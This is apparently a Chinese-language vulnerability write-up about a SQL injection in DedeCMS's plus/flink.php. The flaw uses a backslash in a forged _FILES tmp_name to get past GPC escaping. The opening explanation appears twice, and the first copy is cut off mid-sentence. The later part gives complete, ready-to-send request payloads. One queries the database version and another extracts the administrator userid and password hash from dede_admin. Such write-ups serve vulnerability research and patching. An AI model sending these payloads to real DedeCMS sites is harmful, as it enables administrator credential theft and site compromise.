VULHUB ™

<p>common.inc.php</p><p>这里开始过滤得很完整，往下看</p><p>//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数</p><p>PHP</p><pre data-lang="php" class="lang-php">php if($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); } </pre><p>uploadsafe.inc.php</p><p>//29行</p>``` $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); ```<p>能绕过 GPC</p><p>plus\flink.php</p><p>虽然都经过 htmlspecialchars</p><p>我们看看：</p><p>PHP</p><pre data-lang="php" class="lang-php">htmlspecialchars(string,quotestyle,character-set)</pre><p>可选。规定如何编码单引号和双引号。</p><p>ENT_COMPAT – 默认。仅编码双引号。</p><p>ENT_QUOTES – 编码双引号和单引号。</p><p>ENT_NOQUOTES – 不编码任何引号。</p><p>默认情况下仅编码双引号。</p><p>这里不是重点，不过也是能利用的条件之一，用于绕过dede自带的ids。</p><p>构造webname 值为：</p><p>PHP</p><pre data-lang="php" class="lang-php">&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&_FILES[webname][tmp_name]=pass\</pre><p>这里解释一下，经过GPC后 webname 变为 pass\\</p><p>经过刚才 uploadsafe.inc.php 的函数后</p><p>webname 变为...

<p>common.inc.php</p><p>这里开始过滤得很完整，往下看</p><p>//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数</p><p>PHP</p><pre data-lang="php" class="lang-php">php if($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); } </pre><p>uploadsafe.inc.php</p><p>//29行</p>``` $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); ```<p>能绕过 GPC</p><p>plus\flink.php</p><p>虽然都经过 htmlspecialchars</p><p>我们看看：</p><p>PHP</p><pre data-lang="php" class="lang-php">htmlspecialchars(string,quotestyle,character-set)</pre><p>可选。规定如何编码单引号和双引号。</p><p>ENT_COMPAT – 默认。仅编码双引号。</p><p>ENT_QUOTES – 编码双引号和单引号。</p><p>ENT_NOQUOTES – 不编码任何引号。</p><p>默认情况下仅编码双引号。</p><p>这里不是重点，不过也是能利用的条件之一，用于绕过dede自带的ids。</p><p>构造webname 值为：</p><p>PHP</p><pre data-lang="php" class="lang-php">&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&_FILES[webname][tmp_name]=pass\</pre><p>这里解释一下，经过GPC后 webname 变为 pass\\</p><p>经过刚才 uploadsafe.inc.php 的函数后</p><p>webname 变为 pass\</p><p>插入到SQL语句中就变成了</p><p>PHP</p><pre data-lang="php" class="lang-php">INSERT INTO `#@__flink`(sortrank,url,webname,logo,msg,email,typeid,dtime,ischeck) VALUES('50','http://','pass\','</pre><p>即吃掉了后面的 ‘ ，从而实现绕过GPC。</p><p>不过ExecuteNoneQuery不支持错误回显，那我们就构造好，让他显示出来吧。于是后面的logo函数就变成：</p><table><colgroup><col width="6.963788300835655%"><col width="92.89693593314763%"></colgroup><tbody><tr><td>1<br><br></td><td>logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`<br><br></td></tr></tbody></table><p>ischeck 为1即绕过审核，结果直接显示出来。</p><p>完整参数为：</p><p>查版本：</p><p>PHP</p><pre data-lang="php" class="lang-php">Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&_FILES[webname][tmp_name]=pass\</pre> <p>查密码：</p><p>PHP</p><pre data-lang="php" class="lang-php">Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&_FILES[webname][tmp_name]=pass\ </pre>